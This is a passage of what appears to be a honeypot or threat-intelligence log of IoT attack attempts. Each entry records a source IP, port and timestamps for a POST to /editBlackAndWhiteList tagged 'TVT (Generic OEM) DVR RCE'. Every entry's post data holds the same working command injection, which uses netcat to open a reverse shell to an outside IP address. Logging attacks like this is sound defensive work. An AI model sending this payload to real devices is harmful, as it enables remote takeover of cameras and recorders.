- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T00:45:28Z",
- "last_seen": "2019-12-22T00:45:28Z"
- },
- {
- "source_ip_address": "84.232.255.8",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T00:35:08Z",
- "last_seen": "2019-12-22T00:35:08Z"
- },
- {
- "source_ip_address": "189.165.138.121",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-22T00:14:34Z",
- "last_seen": "2019-12-22T00:14:34Z"
- },
- {
- "source_ip_address": "123.241.160.119",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-21T23:49:30Z",
- "last_seen": "2019-12-21T23:49:30Z"
- },
- {
- "source_ip_address": "78.186.182.86",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T23:29:58Z",
- "last_seen": "2019-12-21T23:29:58Z"
- },
- {
- "source_ip_address": "122.116.167.31",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T23:07:58Z",
- "last_seen": "2019-12-21T23:07:58Z"
- },
- {
- "source_ip_address": "189.223.231.146",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T23:06:52Z",
- "last_seen": "2019-12-21T23:06:52Z"
- },
- {
- "source_ip_address": "218.161.124.77",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T23:01:08Z",
- "last_seen": "2019-12-21T23:01:08Z"
- },
- {
- "source_ip_address": "189.213.220.124",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 304,
- "first_seen": "2019-12-19T19:22:56Z",
- "last_seen": "2019-12-21T22:40:18Z"
- },
- {
- "source_ip_address": "211.72.181.96",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T22:30:20Z",
- "last_seen": "2019-12-21T22:30:20Z"
- },
- {
- "source_ip_address": "93.84.86.123",
- "country": "BY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T22:28:21Z",
- "last_seen": "2019-12-21T22:28:21Z"
- },
- {
- "source_ip_address": "138.255.235.21",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T22:17:27Z",
- "last_seen": "2019-12-21T22:17:27Z"
- },
- {
- "source_ip_address": "93.113.43.52",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T22:08:52Z",
- "last_seen": "2019-12-21T22:08:52Z"
- },
- {
- "source_ip_address": "114.34.206.120",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T21:59:39Z",
- "last_seen": "2019-12-21T21:59:39Z"
- },
- {
- "source_ip_address": "60.53.17.234",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T21:52:43Z",
- "last_seen": "2019-12-21T21:52:43Z"
- },
- {
- "source_ip_address": "185.160.110.236",
- "country": "SK",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T21:20:45Z",
- "last_seen": "2019-12-21T21:20:45Z"
- },
- {
- "source_ip_address": "72.186.134.26",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-21T21:11:29Z",
- "last_seen": "2019-12-21T21:11:29Z"
- },
- {
- "source_ip_address": "5.15.130.109",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T20:18:43Z",
- "last_seen": "2019-12-21T20:18:43Z"
- },
- {
- "source_ip_address": "189.180.90.220",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T20:08:31Z",
- "last_seen": "2019-12-21T20:08:31Z"
- },
- {
- "source_ip_address": "189.147.7.235",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T19:52:05Z",
- "last_seen": "2019-12-21T19:52:05Z"
- },
- {
- "source_ip_address": "23.124.47.4",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 28,
- "first_seen": "2019-12-21T19:33:15Z",
- "last_seen": "2019-12-21T19:33:15Z"
- },
- {
- "source_ip_address": "187.188.130.232",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T19:27:38Z",
- "last_seen": "2019-12-21T19:27:38Z"
- },
- {
- "source_ip_address": "2.141.123.6",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T19:23:45Z",
- "last_seen": "2019-12-21T19:23:45Z"
- },
- {
- "source_ip_address": "187.147.132.146",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T18:58:27Z",
- "last_seen": "2019-12-21T18:58:27Z"
- },
- {
- "source_ip_address": "47.34.238.92",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T18:55:42Z",
- "last_seen": "2019-12-21T18:55:42Z"
- },
- {
- "source_ip_address": "84.22.145.215",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-21T18:47:41Z",
- "last_seen": "2019-12-21T18:47:41Z"
- },
- {
- "source_ip_address": "59.126.177.85",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T18:43:36Z",
- "last_seen": "2019-12-21T18:43:36Z"
- },
- {
- "source_ip_address": "109.99.124.110",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
